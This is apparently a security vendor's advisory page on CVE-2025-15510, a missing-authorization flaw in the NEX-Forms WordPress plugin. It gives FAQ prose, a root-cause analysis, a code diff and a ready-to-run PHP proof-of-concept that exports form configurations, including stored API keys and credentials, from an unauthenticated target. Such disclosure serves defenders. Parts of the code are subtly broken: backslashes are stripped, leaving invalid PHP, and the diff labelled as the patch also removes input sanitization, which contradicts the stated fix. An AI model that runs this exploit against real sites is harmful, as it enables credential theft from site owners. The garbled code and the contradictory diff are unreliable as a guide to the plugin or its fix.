What is CVE-2025-15510?

CVE-2025-15510 is a medium severity vulnerability found in the NEX-Forms Ultimate Forms Plugin for WordPress, specifically in versions up to and including 9.1.8. It allows unauthenticated attackers to export sensitive form configurations due to a missing capability check in the NF5_Export_Forms class.

How does this vulnerability work?

The vulnerability allows attackers to send a specially crafted HTTP request to any page where the plugin is active, appending the parameters `export_form=1` and `nex_forms_Id={ID}`. This enables them to export form configurations, which may include sensitive information such as email addresses and API keys.

Who is affected by this vulnerability?

Any WordPress sites using the NEX-Forms Ultimate Forms Plugin version 9.1.8 or earlier are at risk. Administrators should check their plugin version in the WordPress dashboard and update if necessary.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, verify the version of the NEX-Forms plugin installed. If it is version 9.1.8 or earlier, your site is susceptible to this vulnerability. Additionally, you can test the exploit by attempting to access the export functionality without authentication.

How can I fix or mitigate this issue?

To fix the vulnerability, update the NEX-Forms plugin to version 9.1.9 or later, which includes a patch that adds proper authorization checks. If immediate updating is not possible, consider disabling the plugin until it can be updated.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability, meaning it poses a moderate risk to the affected systems. While it does not allow for remote code execution or full site takeover, it can lead to sensitive data exposure.

What kind of data can be exposed through this vulnerability?

Exploitation of this vulnerability can lead to exposure of sensitive data such as email addresses, PayPal API credentials, and third-party integration keys. This information can be leveraged for further attacks or phishing campaigns.

What is the proof of concept for this vulnerability?

The proof of concept involves sending a crafted HTTP request to the vulnerable site with the appropriate parameters to trigger the export functionality. If successful, it returns sensitive form data in a downloadable text file, demonstrating the lack of authorization checks.

How can I protect my site from similar vulnerabilities?

To protect your site, regularly update all plugins and themes to their latest versions, use security plugins to monitor for vulnerabilities, and conduct periodic security audits. Implementing a web application firewall can also help mitigate risks.

What should I do if I suspect my site has been exploited?

If you suspect your site has been exploited, immediately change all administrative passwords, review logs for suspicious activity, and consider restoring from a clean backup. Conduct a thorough security audit to identify and remediate any vulnerabilities.

Are there any known exploits publicly available for this vulnerability?

Yes, there is a proof of concept publicly available that demonstrates how to exploit this vulnerability. Security professionals should be cautious and monitor for any signs of exploitation on their sites.

What is the importance of capability checks in WordPress?

Capability checks are essential in WordPress to ensure that only authorized users can perform certain actions, such as exporting data. Implementing these checks prevents unauthorized access and protects sensitive information.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-15510: NEX-Forms – Ultimate Forms Plugin for WordPress <= 9.1.8 – Missing Authorization to Unauthenticated Sensitive Information Exposure (nex-forms-express-wp-form-builder)

CVE ID CVE-2025-15510

Plugin nex-forms-express-wp-form-builder

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 9.1.8

Patched Version 9.1.9

Disclosed January 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15510:
The NEX-Forms plugin for WordPress contains an unauthenticated information disclosure vulnerability. The flaw allows any site visitor to export complete form configurations, potentially exposing sensitive data like email addresses, API keys, and integration credentials. This vulnerability received a CVSS score of 5.3.

Atomic Edge research identified the root cause in the NF5_Export_Forms class constructor within the file `nex-forms-express-wp-form-builder/includes/classes/class.export.php`. The constructor directly processes the `export_form` and `nex_forms_Id` parameters from user input without performing any capability checks. The class instantiation occurs automatically when the file loads, making the export functionality publicly accessible. The vulnerable code path begins at line 10 of the original file where the class is instantiated with `$formExport = new NF5_Export_Forms();`.

Exploitation requires sending a simple HTTP request to any page where the plugin loads. Attackers append `?export_form=1&nex_forms_Id={ID}` to the URL. The `nex_forms_Id` parameter accepts integer values that an attacker can enumerate to export different forms. No authentication, nonce, or special headers are required. The server responds with a downloadable text file containing the form’s JSON configuration.

The patch introduces a proper authorization wrapper. Developers added a new function `NEXForms_do_form_export()` hooked to the `init` action. This function checks for the `export_form` parameter and validates the user’s capability with `current_user_can( ‘activate_plugins’ )` before instantiating the export class. The patch also removes the automatic class instantiation at the file’s end. Additional authorization checks were added inside the `generate_form()` method as a secondary defense layer.

Successful exploitation leads to direct exposure of all data stored within exported forms. Form configurations often contain sensitive information like PayPal API credentials, SMTP server details, third-party integration keys, and collected email addresses. Attackers can use this data for further attacks, credential theft, or spam campaigns. The vulnerability does not directly enable remote code execution or site takeover.

Differential between vulnerable and patched code

Code Diff

--- a/nex-forms-express-wp-form-builder/includes/classes/class.export.php
+++ b/nex-forms-express-wp-form-builder/includes/classes/class.export.php
@@ -1,5 +1,25 @@
 <?php
 if ( ! defined( 'ABSPATH' ) ) exit;
+
+
+
+add_action('init', 'NEXForms_do_form_export');
+function NEXForms_do_form_export() {
+
+
+	$export_form = isset($_REQUEST['export_form']) ? sanitize_text_field($_REQUEST['export_form']) : false;
+	if($export_form)
+		{
+		if(!current_user_can( 'activate_plugins' ))
+			wp_die();
+		else
+			$formExport = new NF5_Export_Forms();
+		}
+
+}
+
+
+
 if(!class_exists('NF5_Export_Forms'))
 	{
 	class NF5_Export_Forms
@@ -8,75 +28,81 @@
 		* Constructor
 		*/
 		public function __construct(){
+
 			$export_form = isset($_REQUEST['export_form']) ? sanitize_text_field($_REQUEST['export_form']) : '';

 			$db_actions = new NEXForms_Database_Actions();
 			if($export_form)
 				{
 				$form_export = $this->generate_form();
-
-				header("Pragma: public");
-				header("Expires: 0");
-				header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
-				header("Cache-Control: private", false);
-				//header("content-type:application/csv;charset=UTF-8");
-				header("Content-Disposition: attachment; filename="".$db_actions->get_title2(sanitize_title($_REQUEST['nex_forms_Id']),'wap_nex_forms').".txt";" );
-				//header("Content-Transfer-Encoding: base64");
-
-				echo $form_export; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+				if($form_export)
+					{
+					header("Pragma: public");
+					header("Expires: 0");
+					header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+					header("Cache-Control: private", false);
+					//header("content-type:application/csv;charset=UTF-8");
+					header("Content-Disposition: attachment; filename="".$db_actions->get_title2(sanitize_title($_REQUEST['nex_forms_Id']),'wap_nex_forms').".txt";" );
+					//header("Content-Transfer-Encoding: base64");
+
+					echo $form_export; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+					}
 				exit;
 				}
-
 		}
 		/**
 		* Converting data to HTML
 		*/
 		public function generate_form(){
 			global $wpdb;
-
-				$form_data = $wpdb->get_row($wpdb->prepare('SELECT * FROM '.$wpdb->prefix.'wap_nex_forms WHERE Id = %d ',sanitize_title($_REQUEST['nex_forms_Id']))); // phpcs:ignore WordPress.DB.DirectDatabaseQuery
-				//$content = str_replace('\','',$form_data->form_fields);
-				$content = '';
-				$fields 	= $wpdb->get_results("SHOW FIELDS FROM " . $wpdb->prefix ."wap_nex_forms"); // phpcs:ignore WordPress.DB.DirectDatabaseQuery
-				$field_array = array();
-				$count_fields = count($fields);
-				$i = 0;

-				$insert_array = array();
-				$content .= '(';
-				foreach($fields as $field)
+				if(!current_user_can( 'activate_plugins' ))
+					return false;
+				else
 					{
-					if($field->Field!='date_sent')
+					$form_data = $wpdb->get_row($wpdb->prepare('SELECT * FROM '.$wpdb->prefix.'wap_nex_forms WHERE Id = %d ',sanitize_title($_REQUEST['nex_forms_Id']))); // phpcs:ignore WordPress.DB.DirectDatabaseQuery
+					//$content = str_replace('\','',$form_data->form_fields);
+					$content = '';
+					$fields 	= $wpdb->get_results("SHOW FIELDS FROM " . $wpdb->prefix ."wap_nex_forms"); // phpcs:ignore WordPress.DB.DirectDatabaseQuery
+					$field_array = array();
+					$count_fields = count($fields);
+					$i = 0;
+
+					$insert_array = array();
+					$content .= '(';
+					foreach($fields as $field)
 						{
-						$content .= '`'.$field->Field.'`'.(($i<$count_fields-2) ? ',' : '').'';
-						 $my_fields[$field->Field]=$field->Field;
-						 $i++;
+						if($field->Field!='date_sent')
+							{
+							$content .= '`'.$field->Field.'`'.(($i<$count_fields-2) ? ',' : '').'';
+							 $my_fields[$field->Field]=$field->Field;
+							 $i++;
+							}
 						}
-					}
-				$content .= ') VALUES (';
-
-				$j = 0;
-
-
-				foreach($my_fields as $key=>$value)
-					{
-					$insert_array['Id'] =  'NULL';
-					if($key!='date_sent' || $key!='Id')
+					$content .= ') VALUES (';
+
+					$j = 0;
+
+
+					foreach($my_fields as $key=>$value)
 						{
-						$set_value = str_replace('\','',$form_data->$value);
-						$set_value = str_replace(''','',$set_value);
-
-						$insert_array[$key] =  $set_value;
-
-						$j++;
+						$insert_array['Id'] =  'NULL';
+						if($key!='date_sent' || $key!='Id')
+							{
+							$set_value = str_replace('\','',$form_data->$value);
+							$set_value = str_replace(''','',$set_value);
+
+							$insert_array[$key] =  $set_value;
+
+							$j++;
+							}
 						}
+
+
+					$content .= ')';
+
+					return json_encode($insert_array, JSON_UNESCAPED_UNICODE);
 					}
-
-
-				$content .= ')';
-
-				return json_encode($insert_array, JSON_UNESCAPED_UNICODE);
 			}
 		}
 	}
-$formExport = new NF5_Export_Forms();
 No newline at end of file
--- a/nex-forms-express-wp-form-builder/main.php
+++ b/nex-forms-express-wp-form-builder/main.php
@@ -4,7 +4,7 @@
 Plugin URI: https://basixonline.net/nex-forms/pricing/?utm_source=wordpress_fs&utm_medium=upgrade&utm_content=feature_unlock"
 Description: Premium WordPress Plugin - Ultimate Drag and Drop WordPress Forms Builder.
 Author: Basix
-Version: 9.1.8
+Version: 9.1.9
 Author URI: https://basixonline.net/nex-forms/pricing/?utm_source=wordpress_fs&utm_medium=upgrade&utm_content=feature_unlock"
 License: GPL
 Text Domain: nex-forms
@@ -1125,9 +1125,7 @@

 function NEXForms_ui_output( $atts , $echo='',$prefill_array='',$unigue_form_Id=''){

-	ini_set('display_errors', '0');
-	error_reporting(0);
-
+
 	wp_add_inline_script('nex-forms-var', '
 	var exit_popup = 0;
 	var get_nex_forms = {};
@@ -2589,8 +2587,8 @@

 	//PRINT OUTPUT
 	if($echo){
-		//NEXForms_clean_echo2( $output);
-		echo $output;
+		NEXForms_clean_echo2( $output);
+		//echo $output;
 	}
 	else
 		return $output;
@@ -5151,7 +5149,7 @@
 					else
 						{
 						if($_REQUEST[$nf_functions->format_name($match)]!='--- Select ---')
-							$body = str_replace($match,sanitize_text_field($_REQUEST[$nf_functions->format_name($match)]),$body);
+							$body = str_replace($match,$_REQUEST[$nf_functions->format_name($match)],$body);
 						}
 					}
 				}
@@ -5226,7 +5224,7 @@
 					else
 						{
 						if($_REQUEST[$nf_functions->format_name($match)]!='--- Select ---')
-							$admin_body = str_replace($match,sanitize_text_field($_REQUEST[$nf_functions->format_name($match)]),$admin_body);
+							$admin_body = str_replace($match,$_REQUEST[$nf_functions->format_name($match)],$admin_body);
 						}
 					}
 				}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-15510 - NEX-Forms – Ultimate Forms Plugin for WordPress <= 9.1.8 - Missing Authorization to Unauthenticated Sensitive Information Exposure
<?php
$target_url = 'http://vulnerable-site.com/';
$form_id = 1;

$url = $target_url . '?export_form=1&nex_forms_Id=' . $form_id;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Attempt to export form data
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code === 200 && !empty($response)) {
    // Check if response contains form data (likely JSON)
    if (strpos($response, '"form_fields"') !== false || strpos($response, '"Id"') !== false) {
        echo "[+] SUCCESS: Form data exported for ID: $form_idn";
        echo "[+] Response preview: " . substr($response, 0, 200) . "...n";
        
        // Save to file for analysis
        file_put_contents("nexforms_export_$form_id.txt", $response);
        echo "[+] Data saved to: nexforms_export_$form_id.txtn";
    } else {
        echo "[-] No form data found in response. The site may not be vulnerable or the form ID does not exist.n";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-15510?
Overview of the vulnerability
CVE-2025-15510 is a medium severity vulnerability found in the NEX-Forms Ultimate Forms Plugin for WordPress, specifically in versions up to and including 9.1.8. It allows unauthenticated attackers to export sensitive form configurations due to a missing capability check in the NF5_Export_Forms class.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a specially crafted HTTP request to any page where the plugin is active, appending the parameters `export_form=1` and `nex_forms_Id={ID}`. This enables them to export form configurations, which may include sensitive information such as email addresses and API keys.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress sites using the NEX-Forms Ultimate Forms Plugin version 9.1.8 or earlier are at risk. Administrators should check their plugin version in the WordPress dashboard and update if necessary.
How can I check if my site is vulnerable?
Steps for verification
To determine if your site is vulnerable, verify the version of the NEX-Forms plugin installed. If it is version 9.1.8 or earlier, your site is susceptible to this vulnerability. Additionally, you can test the exploit by attempting to access the export functionality without authentication.
How can I fix or mitigate this issue?
Recommended actions
To fix the vulnerability, update the NEX-Forms plugin to version 9.1.9 or later, which includes a patch that adds proper authorization checks. If immediate updating is not possible, consider disabling the plugin until it can be updated.
What does the CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability, meaning it poses a moderate risk to the affected systems. While it does not allow for remote code execution or full site takeover, it can lead to sensitive data exposure.
What kind of data can be exposed through this vulnerability?
Types of sensitive information at risk
Exploitation of this vulnerability can lead to exposure of sensitive data such as email addresses, PayPal API credentials, and third-party integration keys. This information can be leveraged for further attacks or phishing campaigns.
What is the proof of concept for this vulnerability?
Demonstration of the issue
The proof of concept involves sending a crafted HTTP request to the vulnerable site with the appropriate parameters to trigger the export functionality. If successful, it returns sensitive form data in a downloadable text file, demonstrating the lack of authorization checks.
How can I protect my site from similar vulnerabilities?
Best practices for security
To protect your site, regularly update all plugins and themes to their latest versions, use security plugins to monitor for vulnerabilities, and conduct periodic security audits. Implementing a web application firewall can also help mitigate risks.
What should I do if I suspect my site has been exploited?
Response to potential breaches
If you suspect your site has been exploited, immediately change all administrative passwords, review logs for suspicious activity, and consider restoring from a clean backup. Conduct a thorough security audit to identify and remediate any vulnerabilities.
Are there any known exploits publicly available for this vulnerability?
Exploit availability
Yes, there is a proof of concept publicly available that demonstrates how to exploit this vulnerability. Security professionals should be cautious and monitor for any signs of exploitation on their sites.
What is the importance of capability checks in WordPress?
Role of authorization checks
Capability checks are essential in WordPress to ensure that only authorized users can perform certain actions, such as exporting data. Implementing these checks prevents unauthorized access and protects sensitive information.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations